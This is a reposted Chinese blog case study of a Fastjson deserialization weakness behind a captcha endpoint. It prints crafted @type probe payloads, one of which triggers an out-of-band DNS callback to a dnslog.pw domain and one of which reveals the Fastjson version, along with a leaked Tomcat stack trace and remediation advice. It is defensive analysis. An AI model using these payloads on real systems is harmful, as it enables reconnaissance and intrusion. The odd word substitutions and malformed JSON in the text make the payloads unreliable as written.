FastJson引入存在DDos攻击安全漏洞案例分析

李优秀  金牌会员 | 2024-8-19 14:02:37 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 551|帖子 551|积分 1653

FastJson引入存在DDos攻击安全漏洞案例分析


背景

    某集团公司流派网站接口存在DDos攻击安全漏洞,其他服务端工程中依赖Fastjson进行序列化。Fastjson是阿里巴巴开发的一款高性能的Java JSON处理库。本身在处理JSON数据时可能存在安全性题目,如JSON注入攻击。DDoS攻击是指攻击者通过控制大量网络装备(如个人电脑、服务器、物联网装备等),向目标网站或服务器发送海量的、并非出于正常业务须要的访问哀求,以耗尽目标系统或网站的资源,导致用户无法正常利用该系统或访问该网站,从而达到粉碎网站或在线服务正常运营的目标。

原理

     利用Fastjson的某些漏洞(如反序列化漏洞)来构造攻击载荷,从而可能间接导致目标系统资源耗尽,形成类似DDoS的结果。
过程

    我们看到如下模拟测试HTTP接口哀求,响应时间分别是14.3秒与10秒, 攻击者可以基于这个慢响应时间发起对服务器进行DDos攻击



HTTP哀求与响应报文
具体HTTP哀求与响应报文报文如下:
POST https://xxxx/ws/isCaptcha
HTTP/1.1
Host: xxxx
Content-Length: 70
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxxx"}}


HTTP/1.1 500
Content-Type: text/html;charset=utf-8
Content-Length: 7812
Connection: keep-alive
vary: accept-encoding
Content-Language: en
Date: Sat, 30 Mar 2024 07:12:30 GMT
X-Kong-Upstream-Latency: 7
X-Kong-Proxy-Latency: 1
Via: kong/0.14.0
HTTP Status 500 – Internal Server ErrorHTTP Status 500 – Internal Server Error

Type Exception Report
Message Request processing failed; nested exception is com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map
Description The server encountered an unexpected condition that prevented it from fulfilling the request.
Exception
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:965)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)
javax.servlet.http.HttpServlet.service(HttpServlet.java:652)
org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)
javax.servlet.http.HttpServlet.service(HttpServlet.java:733)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
filter.AccessFilters.doFilter(AccessFilters.java:74)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)
Root Cause
com.alibaba.fastjson.JSONException: java.net.InetSocketAddress cannot be cast to java.util.Map
com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:710)
com.alibaba.fastjson.JSON.parseObject(JSON.java:394)
com.alibaba.fastjson.JSON.parseObject(JSON.java:362)
com.alibaba.fastjson.JSON.parseObject(JSON.java:325)
com.xxxx.c2.web.converter.FastJsonMessageConverter.read(FastJsonMessageConverter.java:93)
org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodArgumentResolver.readWithMessageConverters(AbstractMessageConverterMethodArgumentResolver.java:143)
org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.readWithMessageConverters(RequestResponseBodyMethodProcessor.java:180)
org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.resolveArgument(RequestResponseBodyMethodProcessor.java:95)
org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:77)
org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:157)
org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:124)
org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:104)
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandleMethod(RequestMappingHandlerAdapter.java:745)
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:685)
org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:80)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:919)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:851)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:953)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)
javax.servlet.http.HttpServlet.service(HttpServlet.java:652)
org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)
javax.servlet.http.HttpServlet.service(HttpServlet.java:733)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
filter.AccessFilters.doFilter(AccessFilters.java:74)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)
Root Cause
java.lang.ClassCastException: java.net.InetSocketAddress cannot be cast to java.util.Map
com.alibaba.fastjson.parser.deserializer.MapDeserializer.parseMap(MapDeserializer.java:217)
com.alibaba.fastjson.parser.deserializer.MapDeserializer.deserialze(MapDeserializer.java:69)
com.alibaba.fastjson.parser.deserializer.MapDeserializer.deserialze(MapDeserializer.java:43)
com.alibaba.fastjson.parser.deserializer.ContextObjectDeserializer.deserialze(ContextObjectDeserializer.java:9)
com.alibaba.fastjson.parser.DefaultJSONParser.parseObject(DefaultJSONParser.java:705)
com.alibaba.fastjson.JSON.parseObject(JSON.java:394)
com.alibaba.fastjson.JSON.parseObject(JSON.java:362)
com.alibaba.fastjson.JSON.parseObject(JSON.java:325)
com.xxxx.c2.web.converter.FastJsonMessageConverter.read(FastJsonMessageConverter.java:93)
org.springframework.web.servlet.mvc.method.annotation.AbstractMessageConverterMethodArgumentResolver.readWithMessageConverters(AbstractMessageConverterMethodArgumentResolver.java:143)
org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.readWithMessageConverters(RequestResponseBodyMethodProcessor.java:180)
org.springframework.web.servlet.mvc.method.annotation.RequestResponseBodyMethodProcessor.resolveArgument(RequestResponseBodyMethodProcessor.java:95)
org.springframework.web.method.support.HandlerMethodArgumentResolverComposite.resolveArgument(HandlerMethodArgumentResolverComposite.java:77)
org.springframework.web.method.support.InvocableHandlerMethod.getMethodArgumentValues(InvocableHandlerMethod.java:157)
org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:124)
org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:104)
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandleMethod(RequestMappingHandlerAdapter.java:745)
org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:685)
org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:80)
org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:919)
org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:851)
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:953)
org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:855)
javax.servlet.http.HttpServlet.service(HttpServlet.java:652)
org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:829)
javax.servlet.http.HttpServlet.service(HttpServlet.java:733)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
filter.AccessFilters.doFilter(AccessFilters.java:74)
org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:88)
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:106)
Note The full stack trace of the root cause is available in the server logs.
Apache Tomcat/8.5.65





报文分析

敏感信息泄露:
服务器响应中包含了异常的堆栈跟踪信息,这可能泄露了服务器的内部实现细节,攻击者可能利用这些信息进行进一步的攻击。
响应头中的Apache Tomcat/8.5.65表明服务器利用的是Tomcat 8.5版本,这个版本存在已知的安全漏洞,Tomcat 8.5.65存在安全漏洞分别是CVE-2023-45648,发起升级到最新的安全版本。

袒露网关Kong版本0.14.0
X-Kong-Upstream-Latency: :latency是Kong从 upstream service 接收到响应所等待的时间,单位为毫秒
通过ScanPort端口扫描,进一步获取其他开放端口环境

Kong未授权访问漏洞CVE-2020-11710
缺乏错误处理:
服务器在遇到错误时没有进行适当的错误处理,而是直接将异常信息返回给了客户端,这不仅对用户体验欠好,也增加了安全风险。
缺乏输入验证:
从异常信息来看,服务器端在解析JSON时没有进行足够的输入验证,导致类型转换错误。这表明服务器端可能缺乏对输入数据的严格校验。
安全性设置不足:
服务器设置可能没有考虑到错误处理和信息泄露的题目,须要对服务器的错误响应进行设置,避免敏感信息泄露。


测试方法

Fastjson的autotype可能DDOS攻击漏洞,如HTTP接口响应时间 10-20秒, 则存在DDOS安全攻击风险
哀求头
POST https://XXXX/ws/isCaptcha HTTP/1.1
Content-Length: 335
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/json
哀求体
{"@type":"java.net.Inet4Address","val":{"@type":"java.lang.String"{"@type":"java.util.Locale","val":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.lang.String""@type":"java.util.Locale","language":{"@type":"java.lang.String"{1:{"@type":"java.lang.Class","val":"com.mysql.jdbc.Driver"}},"country":"aaa.qmc8xj4s.dnslog.pw"}}}


FastJson版本检测
如下示例,我们看到FastJson的1.2.83版本信息袒露
哀求体:
POST http://xxx.cn/ws/isCaptcha
HTTP/1.1
Content-Length: 41
Content-Type: application/json
{
   "@type": "java.lang.AutoCloseable"


响应:
HTTP/1.1 500
Content-Type: application/json
Connection: keep-alive
Date: Thu, 02 May 2024 03:20:02 GMT
X-Kong-Upstream-Latency: 5
X-Kong-Proxy-Latency: 0
Via: kong/2.0.1
Content-Length: 174
{"timestamp":1714620002102,"status":500,"error":"Internal Server Error","message":"syntax error, expect {, actual EOF, pos 0, fastjson-version 1.2.83","path":"/ws/isCaptcha"}


解决方案

及时升级Fastjson版本
密切关注Fastjson官方发布的安全公告和更新信息,及时将Fastjson库升级到最新版本。新版本通常会修复已知的安全漏洞,提高系统的安全性。
输入验证:
对所有从外部接收的JSON数据进行严格的输入验证。只接受符合预期格式和内容的JSON数据,对包含恶意代码的输入进行过滤或拒绝处理。
审计和监控:
定期对系统进行安全审计和监控,以便及时发现和处理潜在的安全威胁。
利用安全的 JSON 库:
 利用像 Jackson 或 Gson 这样的库,它们通常有更好的安全性特性,好比禁用特定的类或利用安全设置。
禁用不安全的反序列化
如果可能的话,完全避免利用不安全的反序列化技术。


结论

     本案例通过测试与验证发现接口响应时间慢导致DDos攻击安全漏洞,服务端又袒露组件FastJson,Spring,Tomcat等,其实质是Fastjson引入的题目,替换web层依赖Fastjson为Jackson序列化设置。可以短期內解决这个安全漏洞。

本日先到这儿,希望对云原生,技术向导力, 企业管理,系统架构计划与评估,团队管理, 项目管理, 产品管理,信息安全,团队建设 有参考作用 , 您可能感兴趣的文章:
构建创业公司突击小团队
国际化环境下系统架构演化
微服务架构计划
视频直播平台的系统架构演化
微服务与Docker介绍
Docker与CI持续集成/CD
互联网电商购物车架构演变案例
互联网业务场景下消息队列架构
互联网高效研发团队管理演进之一
消息系统架构计划演进
互联网电商搜索架构演化之一
企业信息化与软件工程的迷思
企业项目化管理介绍
软件项目成功之要素
人际沟通风格介绍一
精益IT组织与分享式向导
学习型组织与企业
企业创新文化与等级观念
组织目标与个人目标
初创公司人才招聘与管理
人才公司环境与企业文化
企业文化、团队文化与知识共享
高效能的团队建设
项目管理沟通计划
构建高效的研发与主动化运维
某大型电商云平台实践
互联网数据库架构计划思路
IT根本架构规划方案一(网络系统规划)
餐饮行业解决方案之客户分析流程
餐饮行业解决方案之采购战略制定与实施流程
餐饮行业解决方案之业务计划流程
供应链需求调研CheckList
企业应用之性能实时度量系统演变 如有想了解更多软件计划与架构, 系统IT,企业信息化, 团队管理 资讯,请关注我的微信订阅号:

作者:Petter Liu
出处:http://www.cnblogs.com/wintersun/
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保存此段声明,且在文章页面显着位置给出原文毗连,否则保存追究法律责任的权利。 该文章也同时发布在我的独立博客中-Petter Liu Blog。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

李优秀

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表